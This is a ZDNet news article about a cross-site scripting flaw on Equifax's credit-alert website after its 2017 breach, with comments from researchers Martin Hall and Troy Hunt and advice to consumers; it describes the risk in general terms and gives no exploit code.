Equifax's credit report monitoring site is also vulnerable to hacking

The site has at least one vulnerability that allows a hacker to trick users into turning over sensitive data.
Written by Zack Whittaker, Contributor

The XSS vulnerability in action. (Image: ZDNet)

Equifax's site used to set up credit account monitoring in the wake of last week's security breach is also vulnerable to hackers, ZDNet has learned.

In the aftermath of the breach, the going recommendation has been to set up alerts and freezes on any and all credit accounts. Countless are thought to have flocked to the websites and the credit rating agency phone banks to protect themselves from hackers.

The problem is that that Equifax's site used to set up alerts on individual's credit rating history (which we are not linking to) can be easily spoofed, security researcher Martin Hall told ZDNet.

Also: Equifax exposes credit services' woeful IT, processes, security | Equifax blames open-source software for breach? | Equifax's big fat fail: How not to handle a data breach

The site is used to request a 90-day fraud or active duty alert for credit report holders -- thought to be the majority of Americans.

But vulnerabilities in the site can allow hackers to siphon off personal information of anyone who visits.

The site is vulnerable to a cross-site scripting (XSS) attack, which lets an attacker run malicious code on a legitimate website or web application, such as Equifax's site.

In this case, a hacker can trick a user into loading the site from a malicious link, which prompts for the consumer's social security number and other personal information.

That data could be seen by a malicious actor as soon as the information is submitted.

Because the malicious code is included in Equifax's web address, the malicious prompt will be part of the Equifax domain. The browser thinks that the site is still secure, and displays the "lock" icon in the browser window. That also means that it's difficult to spot from a spam or phishing email because the code is loaded from Equifax's legitimate domain.

Anyone with knowledge of the code can use it in phishing emails to trick unaware consumers into turning over personal information to an attacker -- even though the link and the page appear to be Equifax's domain.

"I looked at the code and noticed that I could break out of the developers code into my own," said Hall. "This gives me full permission to change the page to say or load any content I want."

"Do you trust Equifax with your details? The problem is that post breach they are asking people to enter their personal details all over again while they still have many insecure sites and pages," he said.

Hall said that he reached out to Equifax's security team about several flaws across the company's site but didn't hear back.

Troy Hunt, a security expert who runs the data breach notification site Have I Been Pwned, told ZDNet that it was "alarming" that the flaw existed in the first place, but, "even more alarming that the researcher hasn't been able to get a response when attempting to report it."

Cross site scripting, he said, "enables an attacker to run their own arbitrary JavaScript in a victim's browser which gives them an enormous amount of control over how a vulnerable website behaves."

"They can rewrite the page, change where forms post data do (consequently grabbing any information entered into the page), load external content into the browser and even deliver malware to the victim," said Hunt.

At least one other XSS security issue has been found. It's not known if hackers are actively exploiting the website vulnerability.

Because the website is vulnerable, we can't recommend breach-affected consumers use the Equifax website to set up alerts or credit freezes for the time being until the security flaw is resolved.

CBS News has a detailed report on what to do if you're affected by the data breach. While we would recommend to call Equifax instead, we can't be sure that customer service representatives aren't using the same website.

An Equifax spokesperson did not return a call or email at the time of writing. If that changes, we'll update.

Editorial standards